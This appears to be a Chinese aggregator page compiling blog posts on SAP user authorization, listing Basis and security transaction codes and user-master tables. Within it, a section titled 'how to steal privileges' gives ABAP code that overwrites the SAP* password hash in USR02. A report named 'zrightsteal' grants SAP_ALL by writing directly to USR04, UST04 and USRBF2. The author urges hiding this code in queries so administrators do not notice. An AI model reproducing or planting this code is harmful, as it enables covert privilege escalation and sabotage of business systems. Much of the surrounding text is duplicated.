精华内容
下载资源
问答
  • 系统管理(BASIS)之 SAP用户权限介绍
    2020-12-23 12:06:06

    原标题:系统管理(BASIS)之 SAP用户权限介绍

    BASIS系统管理主要是负责SAP系统的。而在系统管理方面肯定会遇到关于SAP用户权限的问题。以下是关于SAP系统用户的权限详细介绍。

    记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢? 首先明白几个概念.

    1.activity

    这样说吧,我们从activity谈起,activity是什么意思这个你查下字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两,不对,这是我老婆讲的,SAP不是这样子的,是只能insert, update,display什么的.这些东西当年德国佬是写在tobj表中的.activity 也是可分activity group的.

    2.activity category &Authorization group

    Role Vs Profile你看看表T020就知道了,就是什么K,D, A, M什么的. profile是什么呢?实际上可以理解为所有的authorization data(有很多authorization group--{你可使用OBA7填写,

    权限太细也不是好事。和activity组成)的一个集合的名字,通常一个自定义的role产生一个profile,SAP权限控制是根据profile里的authorization data(objects)来控制的role又是什么呢?role只是一个名字而已,然后将profile赋予给它, 比如你SU01建立一个用户,我没有任何role,但是加如SAP_All profile也是可做任何事情.SAP本身有很多default role & profile.

    3.最常用的PFCG->authorizations->change authorization data->

    进入后选取selection criteria 可看到所有的authorization object manually可手工加authorization object,比如你使用某个t-code权限出错误,abap使用SU53检查就知道缺少哪个authorization objec,然后手工加入就可以.你选去authorization levels就可by account type再细分权限.有些甚至直接到表字段.而且你甚至可給一个object分配缓存buffer。返回搜狐,查看更多

    责任编辑:

    更多相关内容
  • SAP 用户权限解析

    千次阅读 2020-12-23 12:06:14
    通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profilename,记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?首先明白几个概念.1.activity这样说吧,我们从activity谈起,activity是什么意思...

    通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile

    name,

    记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?

    首先明白几个概念.

    1.activity

    这样说吧,我们从activity谈起,activity是什么意思这个你查下

    字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两,

    不对,这是我老婆讲的,SAP不是这样子的,是只能insert,

    update,display什么的.

    这些东西当年德国佬是写在tobj表中的.[break]

    activity 也是可分activity group的.

    2.activity category &Authorization group

    Role Vs

    Profile

    你看看表T020就知道了,就是什么K,D, A, M什么的.

    profile是什么呢?实际上可以理解为所有的authorization data(有很多authorization

    group–{你可使用OBA7填写,权限太细也不是好事^_^}和activity组成)的一个集合的名字,通常一个自定义的role产

    生一个profile,SAP权限控制是根据profile里的authorization

    data(objects)来控制的.

    role又是什么呢?role只是一个名字而已,然后将profile赋予给它,

    比如你SU01建立一个

    用户,我没有任何role,但是加如SAP_All profile也是可做任何事情.

    SAP本身有很多default role

    & profile.

    3.最常用的PFCG->authorizations->change authorization

    data->

    进入后选取selection criteria 可看到所有的authorization

    object

    manually可手工加authorization

    object,比如你使用某个t-code权限出错误,abap使用SU53检查就

    知道缺少哪个authorization

    objec,然后手工加入就可以.

    你选去authorization levels就可by account

    type再细分权限.

    有些甚至直接到表字段.而且你甚至可給一个object分配缓存buffer.

    那么SAP是如何做到权限控制的呢,屠夫就用刀小宰一下.

    4.关于权限方面的几个t-code.

    (一)Role(角色)相关T-code:

    PFAC 标准

    PFAC_CHG 改变

    PFAC_DEL

    删除

    PFAC_DIS 显示

    PFAC_INS 新建

    PFAC_STR

    PFCG 创建

    ROLE_CMP 比较

    SUPC

    批量建立角色profile

    SWUJ 测试

    SU03 检测authorzation

    data

    SU25, SU26 检查updated

    profile

    (二)建立用户相关T-code:

    SU0

    SU01

    SU01D

    SU01_NAV

    SU05

    SU50,

    Su51, SU52

    SU1

    SU10 批量

    SU12 批量

    SUCOMP:维护用户公司地址

    SU2

    change用户参数

    SUIM

    用户信息系统

    用户组

    SUGR:维护

    SUGRD:显示

    SUGRD_NAV:还是维护

    SUGR_NAV:还是显示

    (三)关于profile&Authoraztion

    Data

    SU02:直接创建profile不用role

    SU20:细分Authorization Fields

    SU21(SU03):****维护Authorization

    Objects(TOBJ,USR12).

    对于凭证你可细分到:

    F_BKPF_BED: Accounting Document: Account

    Authorization for Customers

    F_BKPF_BEK: Accounting Document: Account

    Authorization for Vendors

    F_BKPF_BES: Accounting Document: Account

    Authorization for G/L Accounts

    F_BKPF_BLA: Accounting Document: Authorization

    for Document Types

    F_BKPF_BUK: Accounting Document: Authorization for Company

    Codes

    F_BKPF_BUP: Accounting Document: Authorization for Posting

    Periods

    F_BKPF_GSB: Accounting Document: Authorization for Business

    Areas

    F_BKPF_KOA: Accounting Document: Authorization for Account

    Types

    F_BKPF_VW : Accounting Document: Change Default Values for

    Doc.Type/PsKy

    然后你进去还可细分,这些个东西是save在USR12表中的. 在DB层是UTAB.

    对具体transaction code细分:

    SU22,SU24

    SU53:*** 就是你出错用来检查没有那些authoraztion

    objects.

    SU56:分析authoraztion data

    buffers.

    SU87:用来检查用户改变产生的history

    SU96,SU97,SU98,SU99:干啥的?

    SUPC:批量产生role

    DB和logical层:

    SUKRI:Transaction Combinations Critical for

    Security

    tables:

    TOBJ : All avaiable authorzation objects.(全在此)

    USR12:

    用户级authoraztion值

    —————————–

    USR01:主数据

    USR02:密码在此

    USR04:授权在此

    USR03:User

    address data

    USR05:User Master Parameter ID

    USR06:Additional Data per

    User

    USR07:Object/values of last authorization check that

    failed

    USR08:Table for user menu entries

    USR09:Entries for user menus

    (work areas)

    USR10:User master authorization profiles

    USR11:User Master

    Texts for Profiles (USR10)

    USR12:User master authorization

    values

    USR13:Short Texts for Authorizations

    USR14:Surchargeable Language

    Versions per User

    USR15:External User Name

    USR16:Values for Variables for

    User Authorizations

    USR20:Date of last user master

    reorganization

    USR21:Assign user name address key

    USR22:Logon data without

    kernel access

    USR30:Additional Information for User Menu

    USR40:Table for

    illegal passwords

    USR41:当前用户

    USREFUS:

    USRBF2

    USRBF3

    UST04:User

    Profile在此

    UST10C: Composite profiles

    UST10S: Single profiles

    (角色对应的

    UST12 : Authorizations…………………………

    …………………………

    如何窃取权限

    …………………………

    用户:

    User type用户类型(干啥用的不讲):

    通常的用户类型有

    a.dialog (就是normal

    user)

    b.communication

    c.system

    d.service

    e.reference.

    通常你在使用任何T-code前一定会有权限检测的.

    AUTHORITY_CHECK:这个函数只是小检查一下你的user有没有,什么时候过期.

    **如果coding只要使用此函数就够了.

    AUTHORITY_CHECK_TCODE:检查T-code

    这倆函数是真正检查autorization

    objects的.

    SUSR_USER_AUTH_FOR_OBJ_GET:

    AUTHORIZATION_DATA_READ_SELOBJ:

    ——————————————

    将SAP*的密码改成123的程序,很简单.

    我们找到那个user

    logon表USR02.

    (DF52478E6FF90EEB是经过SAP加密保存在DB的,哪位老兄研究过SAP的密码加密?)

    report

    zmodSAP*.

    data zUSR02 like USR02 .

    select single * into zUSR02 from

    USR02

    where BNAME = ‘SAP*’.

    zUSR02-Bcode = ‘DF52478E6FF90EEB’ .

    Update

    USR02 from zUSR02 .

    现在的问题是如何让你那basis不发现,很简单,将code隐藏在Query里面,就是说你做一个

    query,query是会产生code的,然后你加入此代码,谁能想到???然后你就等你的basis去哭…

    这样做太狠毒了.还是自己偷偷搞自己的用户吧.

    在此你必须对权限结构非常清晰.

    权限和三个表有关系.

    a.USR04

    b.USR04

    c.USRBF2

    这个表是对应到所用的authorzization

    objects的.

    *&———————————————————————*

    *&

    Report : Steal SAP ALL Right *

    *&

    Creation Date : 2004.04.01 *

    *&

    Created by : Stone.Fu *

    *&

    Description : 可窃取SAP ALL权限 *

    *&

    Modified Date : 2005.11.02

    *& Description : 将此code hide在report painter

    or query code

    *

    *&———————————————————————*

    report zrightsteal.

    data zUSR04 like USR04 . “????????work area??

    data

    zUST04 like USR04 .

    data zPROFS like USR04-PROFS.

    data ZUSRBF2 like USRBF2

    occurs 0 with header line.

    “USRBF2?????internal table

    ** Update

    Authorization table USR04.

    select single * into zUSR04 from USR04

    where

    BNAME = ‘ZABC2’. “SAP All 权限

    move ‘C SAP_ALL’ to zPROFS .

    ZUSR04-NRPRO =

    ’14’.

    zUSR04-PROFS = zPROFS.

    Update USR04 from zUSR04 .

    **Update User authorization masters table UST04 .

    select single * into

    zUST04 from UST04

    where BNAME = ‘ZABC2’.

    zUST04-PROFILE = ‘SAP_ALL’. “SAP

    all 权限

    Update UST04 from zUST04 .

    *?????insert

    *ZUST04-MANDT = ‘200’.

    *ZUST04-BNAME =

    ‘ZABC2’.

    *ZUST04-PROFILE = ‘SAP_ALL’.

    *Insert UST04 from ZUST04 .

    select * from USRBF2 into table ZUSRBF2

    where BNAME = ‘SAP*’ .

    Loop at

    ZUSRBF2.

    ZUSRBF2-BNAME = ‘ZABC2’.

    Modify ZUSRBF2 INDEX sy-tabix

    TRANSPORTING BNAME.

    endloop.

    INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING

    DUPLICATE KEYS.

    自己建立一个ztest用户不给它任何权限然后在test machine上run 报表zrightsteal.

    然后ztest就是SAP_ALL了, 然后你将code hide在SQP query的code中. ABAP

    code太容易被人发现.

    展开全文
  • SAP 用户权限

    2020-12-23 12:06:08
    SE93 查询所有TCODE或者 table: tstcSE16 displaySUIM 查询用户信息的报表们技术流SAP常用的TCODE---BASIS事务码 描述 ( 中英文 )SBIT Menu 菜单SBTA Test background processing 后台处理测试SBTU Background ...

    SE93 查询所有TCODE

    或者 table: tstc

    SE16 display

    SUIM 查询用户信息的报表们

    技术流

    SAP常用的TCODE---BASIS

    事务码 描述 ( 中英文 )

    SBIT Menu 菜单

    SBTA Test background processing 后台处理测试

    SBTU Background processing for user 对用户的后台处理

    SM36 Define Background Job 定义后台作业

    SM37 Background Job Overview 后台作业概览

    SM39 Job Analysis 作业分析

    SM49 Execute external OS commands 执行外部 OS 命令

    SM61 Menu 菜单

    SM62 Menu 菜单

    SM63 Display/Maintain Operating Mode Sets 显示 / 保持操作方式设置

    SM64 Release of an Event 事件的释放

    SM65 Background Processing Analysis Tool 后台处理分析工具

    SM67 Job Scheduling 作业调度

    SM68 Job Administration 作业管理

    SM69 Maintain external OS commands 维护外部 OS 命令

    SMX Display Own Jobs 显示自己的作业

    SPBM Monitoring parallel background tasks 监控类似的后台任务

    SPBT Test: Parallel background tasks 文本 : 匹配后台任务

    DB16 DB system check (trigger/browse) DB system check

    (trigger/browse)

    DB17 DB system check (configure) DB system check (configure)

    DB20 No.of table tupels acc. to stat. No.of table tupels acc. to

    stat.

    DB21 Maintenance control table DBSTATC Maintenance control table

    DBSTATC

    RZ01 Job Scheduling Monitor 作业计划监视器

    RZ02 Network Graphics for SAP Instances 网络图 SAP

    RZ04 Maintain SAP Instances 保持 SAP 实例

    RZ06 Alerts Thresholds Maintenance 警报门限维护

    RZ08 SAP Alert Monitor SAP 报警监视器

    RZ12 Maintain RFC server group assignment 维护 RFC 指定服务器组

    SM66 Systemwide Work Process Overview 系统工作过程概述

    SMLG Maintain Logon Group 维护登录组

    SRZL Menu 菜单

    SM02 System Messages 系统消息

    SM04 User Overview 用户概览

    SM13 Display Update Records 显示更新记录

    SM50 Work Process Overview 工作进程概述

    SM51 List of SAP Servers SAP 服务器的清单

    SM54 TXCOM maintenance TXCOM 维护

    SM55 THOST Maintenance THOST 维持

    SM56 Number Range Buffer 数字范围缓冲区

    SMGW Gateway Monitor 网关监控器

    ST07 Application monitor 应用程序监视器

    AL01 SAP Alert Monitor SAP 报警监视器

    AL02 Database alert monitor 数据库警报监测器

    AL03 Operating system alert monitor 操作系统警告监视器

    AL04 Monitor call distribution 监视呼叫分配

    AL05 Monitor current workload 监视当前的工作负荷

    AL06 Performance: Upload/Download 执行 : 上载 / 下装

    AL07 EarlyWatch Report 初期察看报告

    AL08 Users Logged On 登录的用户

    AL09 Data for database expertise 专家数据库的数据

    AL10 Download to Early Watch 下载早观察

    AL11 Display SAP Directories 显示 SAP 目录

    AL12 Display table buffer (Exp. session) 显示表缓冲

    AL13 Display Shared Memory (Expert mode) 显示共享内存 ( 输出方式 )

    AL15 Customize SAPOSCOL destination 自定义 SAPOSCOL 目的地

    AL16 Local Alert Monitor for Operat.Syst. 操作系统的本地报警监视器

    AL17 Remote Alert Monitor f.Operat. Syst. 操作系统的远程报警监视器

    AL18 Local File System Monitor 本地的文件系统监视器

    AL19 Remote File System Monitor 远程文件系统监视器

    AL20 EarlyWatch Data Collector List EarlyWatch 数据收集器清单

    AL21 ABAP Program analysis ABAP Program analysis

    AL22 Dependent objects display Dependent objects display

    DB01 Analyze exclusive lockwaits 分析互斥锁定等待

    DB02 Analyze tables and indexes 分析表和索引

    DB03 Parameter changes in database 在数据库中参数改变

    DB05 Analysis of a table acc. to index Analysis of a table acc. to

    index

    DB11 Early Watch Profile Maintenance 初期察看描述文件维护

    DB12 Overview of Backup Logs 备份日志的概观

    DB13 Database administration calendar 数据库管理日历

    DB14 Show SAPDBA Action Logs 显示 SAPDBA 行为记录

    DB15 CCMS - Document archiving CCMS - Document archiving

    OS01 LAN check with ping 通过 ping 检查 LAN

    OS02 Operating system configuration 操作系统配置

    OS03 O/S Parameter changes O/S 参数更改

    OS04 Local System Configuration 本地的系统配置

    OS05 Remote System Cconfiguration 远程系统配置

    OS06 Local Operating System Activity 本地的操作系统作业

    OS07 Remote Operating System Activity 远程操作系统活动性

    OSS1 Logon to Online Service System 注册到联机服务系统

    SDBE Explain an SQL statement 匹配码对象(测试)

    ST02 Setups/Tune Buffers 设置 / 调谐缓冲

    ST03 Performance,SAP Statistics, Workload 性能 ,SAP 统计 , 工作负荷

    ST04 Select DB activities 选定数据库中的活动

    ST05 Trace for SQL, Enqueue, RFC, Memory SQL 跟踪

    ST06 Operating System Monitor 操作系统监视器

    ST08 Network Monitor 网络器

    ST09 Network Alert Monitor 网络敬报器

    ST10 Table call statistics 表调用统计

    ST4A Database: Shared cursor cache (ST04) Database: Shared cursor

    cache (ST04)

    STAT Local transaction statistics 本地事务统计

    STP4 Select DB activities Select DB activities

    STUN Menu Performance Monitor 菜单性能监视器

    TKOF Turn off Oracle trace 关闭 Oracle 跟踪

    TKON Turn off Oracle trace 关闭 Oracle 跟踪

    TKPR Display trace file 显示跟踪文件

    TU01 Call Statistics 调用统计

    TU02 Parameter changes 参数改变

    SP00 Spool and related areas 假脱机及相关区域

    SP01 Output Controller 输出控制

    SP02 Display Output Requests 显示输出请求

    SP03 Spool: Load Formats 假脱机 : 载入格式

    SP1T Output Control (Test) 输出控制(测试)

    SPAD Spool Administration 假脱机管理

    SPAT Spool Administration (Test) 假脱机管理(测试)

    SPCC Spool consistency check 假脱机一致性检查

    SPIC Spool installation check 假脱机安装检查

    SPTP Text elem. maint. for print formats 用于打印格式的文本元素维护

    SP11 TemSe directory TemSe 目录

    SP12 TemSe Administration TemSe 管理

    SE92 Maintain System Log Messages 维护系统日志消息

    SM20 System Audit Log 系统审计日志

    SM21 System Log 系统日志

    S001 CASE 工具菜单 CASE 工具菜单

    S002 Menu Administration 菜单管理

    SDW0 ABAP/4 Development WB Initial Screen ABAP/4 开发工作台初始屏幕

    SYST Menu 菜单

    SDMO Dynamic Menu (old) 动态菜单 ( 旧 )

    SMEN Session Manager Menus 会话管理菜单

    SU55 Call the Session Manager menus 调用会话管理菜单

    RE_GGREPO1 Test report 1 测试报表 1

    RE_GGREPO2 Test report 1 测试报表 1

    SU24 Auth. obj. check under transactions 事务中权限对象检查

    SU25 Upgrade Tool for Profile Generator 配置文件生成器的升级工具

    SU26 Upgrade tool for Profile Generator 配置文件生成器的升级工具

    SUPC Profiles for activity groups 作业组的参数文件

    SUPN Number range maint.: PROF_VARIS 编码范围维护 : PROF_VARIS

    SUPO Maintain org. levels 维护初始级别

    SM0 Work Process Overview 工作处理概述

    SU02 Maintain Authorization Profiles 维护权限参数文件

    SU03 Maintain Authorizations 维护权限

    SU10 Mass Changes to User Master Records 对用户主记录的大量修改

    SU12 Mass Changes to User Master Records 用户主记录的大量修改

    SU2 Maintain user parameter 维护用户参数

    SU20 Maintain Authorization Fields 维护权限字段

    SU21 Maintain Authorization Objects 维护权限对象

    SU22 Auth. Object Usage in Transactions 事务中权限对象的用法

    SU23 Load Tables in TAUTL 在 TAUTL 中装入表

    SU52 Maintain User Parameters 维护用户参数

    SU53 Display Check Values 显示检查值

    SU54 Session Manager 会话管理器

    SU56 Analyze User Buffer 分析用户缓冲区

    SU80 Archive user change documents 存档用户更改文档

    SU81 Archive user password change doc. 归档用户口令更改文档

    SU82 Archive profile documents 档案参数文件文档

    SU83 Archive authorization docs. 存档授权文档

    SU84 Read archived user change documents 阅读已存档的用户修改文档

    SU85 Read archived password change doc. 阅读已存档的口令修改文档

    SU86 Read profile change documents 读参数文件更改文档

    SU87 Read authorization change documents 读授权更改文档

    SU96 Table maint.: Change SUKRIA 表维护:修改 SUKRIA

    SU97 Table maint.: Display SUKRIA 表维护:显示 SUKRIA

    SU98 Call report RSUSR008 调用报表 RSUSR008

    SU99 Call report RSUSR008 调用报表 RSUSR008

    SUIM Call AUTH reporting tree (info sys.) 调用 AUTH 报表树(信息系统)

    SU01 User Maintenance 用户维护

    SU01_NAV User maint. to include in navigation 包含在导航中的用户维护

    SU01D User Display 用户显示

    SU3 Maintain Users Own Data 维护用户自己的数据

    SE01 Transport Organizer 传送组织者

    SE03 Workbench Organizer: Tools 工作台组织器:工具

    SE06 Set Up Workbench Organizer 设置工作台组织器

    SE07 Transport System Status Display 传输系统状态显示

    SE09 Workbench Organizer 工作平台组织者

    SE10 Customizing Organizer 自定义组织者

    SE17 General Table Display 通用表显示

    STDR TADIR consistency check TADIR 一致性检查

    通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name,

    记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?

    首先明白几个概念.

    1.activity

    这样说吧,我们从activity谈起,activity是什么意思这个你查下

    字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两,

    不对,这是我老婆讲的,SAP不是这样子的,是只能insert, update,display什么的.

    这些东西当年德国佬是写在tobj表中的.

    activity 也是可分activity group的.

    2.activity category &Authorization group

    Role Vs Profile

    你看看表T020就知道了,就是什么K,D, A, M什么的.

    profile是什么呢?实际上可以理解为所有的authorization data(有很多authorization

    group--{你可使用OBA7填写,权限太细也不是好事^_^}和activity组成)的一个集合的名字,通常一个自定义的role产

    生一个profile,SAP权限控制是根据profile里的authorization data(objects)来控制的.

    role又是什么呢?role只是一个名字而已,然后将profile赋予给它, 比如你SU01建立一个

    用户,我没有任何role,但是加如SAP_All profile也是可做任何事情.

    SAP本身有很多default role & profile.

    3.最常用的PFCG->authorizations->change authorization

    data->

    进入后选取selection criteria 可看到所有的authorization object

    manually可手工加authorization

    object,比如你使用某个t-code权限出错误,abap使用SU53检查就

    知道缺少哪个authorization objec,然后手工加入就可以.

    你选去authorization levels就可by account type再细分权限.

    有些甚至直接到表字段.而且你甚至可給一个object分配缓存buffer.

    那么SAP是如何做到权限控制的呢,屠夫就用刀小宰一下.

    4.关于权限方面的几个t-code.

    (一)Role(角色)相关T-code:

    PFAC 标准

    PFAC_CHG 改变

    PFAC_DEL 删除

    PFAC_DIS 显示

    PFAC_INS 新建

    PFAC_STR

    PFCG 创建

    ROLE_CMP 比较

    SUPC 批量建立角色profile

    SWUJ 测试

    SU03 检测authorzation data

    SU25, SU26 检查updated profile

    (二)建立用户相关T-code:

    SU0

    SU01

    SU01D

    SU01_NAV

    SU05

    SU50, Su51, SU52

    SU1

    SU10 批量

    SU12 批量

    SUCOMP:维护用户公司地址

    SU2 change用户参数

    SUIM 用户信息系统

    用户组

    SUGR:维护

    SUGRD:显示

    SUGRD_NAV:还是维护

    SUGR_NAV:还是显示

    (三)关于profile&Authoraztion Data

    SU02:直接创建profile不用role

    SU20:细分Authorization Fields

    SU21(SU03):****维护Authorization Objects(TOBJ,USR12).

    对于凭证你可细分到:

    F_BKPF_BED: Accounting Document: Account Authorization for

    Customers

    F_BKPF_BEK: Accounting Document: Account Authorization for

    Vendors

    F_BKPF_BES: Accounting Document: Account Authorization for G/L

    Accounts

    F_BKPF_BLA: Accounting Document: Authorization for Document

    Types

    F_BKPF_BUK: Accounting Document: Authorization for Company

    Codes

    F_BKPF_BUP: Accounting Document: Authorization for Posting

    Periods

    F_BKPF_GSB: Accounting Document: Authorization for Business

    Areas

    F_BKPF_KOA: Accounting Document: Authorization for Account

    Types

    F_BKPF_VW : Accounting Document: Change Default Values for

    Doc.Type/PsKy

    然后你进去还可细分,这些个东西是save在USR12表中的. 在DB层是UTAB.

    对具体transaction code细分:

    SU22,SU24

    SU53:*** 就是你出错用来检查没有那些authoraztion objects.

    SU56:分析authoraztion data buffers.

    SU87:用来检查用户改变产生的history

    SU96,SU97,SU98,SU99:干啥的?

    SUPC:批量产生role

    DB和logical层:

    SUKRI:Transaction Combinations Critical for Security

    tables:

    TOBJ : All avaiable authorzation objects.(全在此)

    USR12: 用户级authoraztion值

    -----------------------------

    USR01:主数据

    USR02:密码在此

    USR04:授权在此

    USR03:User address data

    USR05:User Master Parameter ID

    USR06:Additional Data per User

    USR07:Object/values of last authorization check that failed

    USR08:Table for user menu entries

    USR09:Entries for user menus (work areas)

    USR10:User master authorization profiles

    USR11:User Master Texts for Profiles (USR10)

    USR12:User master authorization values

    USR13:Short Texts for Authorizations

    USR14:Surchargeable Language Versions per User

    USR15:External User Name

    USR16:Values for Variables for User Authorizations

    USR20:Date of last user master reorganization

    USR21:Assign user name address key

    USR22:Logon data without kernel access

    USR30:Additional Information for User Menu

    USR40:Table for illegal passwords

    USR41:当前用户

    USREFUS:

    USRBF2

    USRBF3

    UST04:User Profile在此

    UST10C: Composite profiles

    UST10S: Single profiles (角色对应的

    UST12 : Authorizations..............................

    展开全文
  • 表名描述AGR_1016活动组参数文件名称AGR_1016B活动组参数文件名称AGR_1250活动组的权限数据AGR_1251活动组的权限数据AGR_1252权限的组织元素AGR_1253作业组的权限数据 - 静态对象AGR_AGRS组合角色中的角AGR_AGRS2...

    表名描述

    AGR_1016活动组参数文件名称

    AGR_1016B活动组参数文件名称

    AGR_1250活动组的权限数据

    AGR_1251活动组的权限数据

    AGR_1252权限的组织元素

    AGR_1253作业组的权限数据 - 静态对象

    AGR_AGRS组合角色中的角

    AGR_AGRS2作用定义

    AGR_ATTS角色属性

    AGR_BUFFI角色的 Interne

    AGR_BUFFI2Internet 链接

    AGR_BUFFI3Internet 链接

    AGR_CUSTOM角色的定制对象

    AGR_DATEU角色的个人设置

    AGR_DEFINE角色定义

    AGR_FAVOS PFCG 的个人设

    AGR_FLAGS角色属性

    AGR_FLAGSB角色属性

    AGR_HIER菜单结构信息表

    AGR_HIER_BO Table for Obje

    AGR_HIER2菜单结构信息 -

    AGR_HIER3菜单结构信息 -

    AGR_HIERT角色菜单文本

    AGR_HIERT2角色菜单文本 -

    AGR_HIERT3角色菜单文本 - 原始 SAP

    AGR_HPAGE Role Home Page

    AGR_HPAGET Description of the Home Page for AGR_INFO Filter Values from Generation Run AGR_LOGSYS逻辑系统

    AGR_LSD角色属性

    AGR_MAP_KNUMA换算表 AG_GUID CRM <> KNUMA

    AGR_MAPP角色中的 MiniApps

    AGR_MARK报表 SAPPROFC_NEW 的表格

    AGR_MEM_INITIAL协议: 初始上载的缓冲

    AGR_MINI角色中的 MiniApps

    AGR_MINI2角色中的 MiniApps

    AGR_MINIT角色最小应用文本

    AGR_MINIT2角色最小应用文本

    AGR_NUM_2分配参数文件名的内部计数器

    AGR_NUMBER分配参数文件名的内部计数器

    AGR_OBJ Assignment of Menu Nodes to Role AGR_PROF角色的参数文件名

    AGR_REL_KNUMA_CM分配: 协议 > 活动

    AGR_SELECT将角色分配到事务代码

    AGR_TCDTXT将角色分配到事务代码

    AGR_TCODE3将角色分配到事务代码

    AGR_TCODES将角色分配到事务代码

    AGR_TEXTS用于层次菜单的文件结

    AGR_TIME角色的日期标记

    AGR_TIMEB角色的日期标记

    AGR_TIMEC角色的日期标记

    AGR_TIMED角色的日期标记

    AGR_USERS分配角色到用户

    展开全文
  • sap_与权限相关

    2020-12-23 12:06:04
    sap权限相关表表名 短文本RSPFPAR 参数AGR_1016 活动组参数文件名称AGR_1016B 活动组参数文件名称AGR_1250 活动组的权限数据AGR_1...
  • SAP权限及角色管理

    2018-09-07 00:04:59
    SAP 介绍了用户权限,角色的概念,后台配置,实际应用。
  • sap权限相关

    2020-12-23 12:06:10
    sap权限相关表表名 短文本RSPFPAR 参数AGR_1016 活动组参数文件名称AGR_1016B 活动组参数文件名称AGR_1250 活动组的权限数据AGR_1...
  • sap权限相关后台

    千次阅读 2020-12-23 12:06:08
    SAP权限相关表表名 短文本RSPFPAR 参数AGR_1016 活动组参数文件名称AGR_1016B 活动组参数文件名称AGR_1250 活动组的权限数据AGR_1...
  • SAP权限设定

    千次阅读 2020-12-23 12:06:08
    SAP权限控制是控制到字段级的,换句话说,其权限控制机制可以检查你是否有权限维护某张透明的某一个字段。*用户(User):具体操作SAP系统的用户,即登陆SAP Logon输入的用户。使用事物码SU01...
  • SAP 查询用户权限

    千次阅读 2021-03-13 10:21:07
    SU53——检查用户权限数据(重要!!),可以检查当前动作缺失了什么权限 SU24——维护权限缺省值 SUIM——用户信息系统(重要!!) PFCG——角色维护 SU01——用户维护 SU02——参数文件 SU3 ——...
  • SAP常用的TCODE—BASIS 序号 事务码 描述 ( 中英文 ) 1 SBIT Menu 菜单 2 SBTA Test background processing 后台处理测试 3 SBTU Background processing for user 对用户的后台处理 4 SM36 Define Background Job...
  • SAP用户权限控制设置及开发

    万次阅读 多人点赞 2017-02-07 09:52:07
    创建用户SU01 ...参数:SAP很多屏幕字段都会对应一个指定的参数ID,该参数ID及值一般存储在SAP所划分的内存区域中,在SAP GUI启动时会自动读取,并作为默认值自动赋值给屏幕上相关字段中,如SD中销售组织
  • 主要目的在于定期(如每年)对用户权限进行一次全面的检查,避免出现一些用户离职,转岗,越权等情况未及时处理形成的权限管理漏洞。下面记录一下操作方法。 事务SUIM进行用户信息系统,按如下路径进入到相应功能;...
  • SAP 用户权限学习

    千次阅读 2015-07-21 15:02:47
    一、SAP用户权限架构 SAP用户权限是通过Role(角色)来定义的, 从Role到最低层的最小控制单元Authorization field总共有4层,结构示意图如下. – SAP 用户权限学习" style="margin:0px; padding:0px; ...
  • 在很多SAP标准程序中,已经存在了对权限数据的调用及管控功能 在程序中可以通过ABAP程序编辑器快速插入调用权限的代码: 权限代码需要放在AT SELECTION-SCREEN.事件块里 AUTHORITY-CHECK OBJECT ‘’ ID ‘’ ...
  • SAP权限检查SU53

    2021-11-18 08:26:30
    这样的好处在于:用户出现权限问题时,只需要向管理员报告自己的用户名即可,其它问题都由管理员来解决,避免了因用户计算机能力不足造成的过多解释,减少了公司网络传输抓图的带宽占用,节约了双方的时间。...
  • SAP User Access FormSAP用户权限申请 LAST NAME姓: FIRST NAME名: USER ID SAP账号: New User新用 ...
  • 1. AGR_USERS 角色与用户对应关系 2. AGR_TEXTS 角色的中文描述 3. AGR_TCODES  查询角色所有的T-code, 报表类型 = TR 4. 用户信息USER_ADDR 5. AGR_1251 查询角色所有的T-code ,角色对象 = S_TCODE 6. ...
  • SAP系统内的权限管理是以“角色/Role”这一概念展开的,一个“角色/Role”上分配了体现权限的一组“事务代码/T-Code”和体现限制的授权“参数文件/profile”。 用户权限是指用户能够访问哪些资源或执行哪些任务...
  • USR02 #记录系统中所有已存在的用户 USR01 #记录系统中所有已存在用户的默认打印设备Default Out Put Device AGR_TCODES # 记录ROLE与T-CODE映射关系 AGR_USERS # 记录ROLE与USERID映射关系 AGR_1251 # 记录ROLE与...
  • SAP 权限配置

    千次阅读 2018-11-22 18:09:04
    转&nbsp;&nbsp;&nbsp;&nbsp;...SAP系统权限:某SAP操作用户能在SAP系统中做哪些操作。比如(大致概念)用户XX-A只能查看物料信息,在SAP系统中就分配事物码MM03给XX-A。SAP权限控...
  • SAP 用户权限及破解

    千次阅读 2019-06-05 10:48:05
    警惕:SAP 用户权限及破解SAP 用户权限用户权限解剖:通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的prifile name, 记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?...
  • SCHEMA就相当于 mysql中的数据库,oracle中的空间 HPC-H中的数据 权限配置 选中一个文件夹,然后点击SQL,就能出现sql查询输入框 一:新建用户建表 # 创建用户 CREATE USER HANA_TPCH PASSWORD Xing1234 NO FORCE_...
  • 在很多项目中我们需要定义IMG后台配置权限设置,批量增加某个或几个模块的配置权限或生成自己的IMG清单。这里介绍一个比较简单的实现方法: 在SPRO_ADMIN – 工具 -> 定制 -> IMG -> Project ...
  • SAP用户出口和增强

    2019-03-24 17:53:21
    SAP用户出口和增强 SAP 灵活性的最集中的体现除了后台配置外,就是增强和修正,即为了让软件更好的满足 用户的需求,SAP 允许客户在标准软件的基础上做功能性的修改; 2. 为了避免用户修改失控,损坏标准系统,...
  • SAP 用户账号管理系统

    2021-01-17 00:20:57
    引言 SAP 用户权限管理系统(SAP License优化管理SAP软件资产管理)产品是应用于SAP系统权限风险控制及注册用户账号管理为目标的SAP软件资产精益化管理方案。 ...一、系统概述 ...SAP 用户权限管理系统使用S
  • 获取SAP系统sap_all权限

    千次阅读 2014-12-14 14:53:56
    尽管SAP系统提供了非常完善的权限控制机制,甚至允许细到字段级和允许用户自定义授权对象,然后SAP权限控制漏洞也是致命的,随便一个小程序就可轻易获取权限 作为职业程序员,对取得权限大多会有一定兴趣(这点催生了一...
  • SAP 用户权限解剖

    2019-03-27 08:57:04
    通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name, 记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢? 首先明白几个概念.1.activity这样说吧,我们从a...

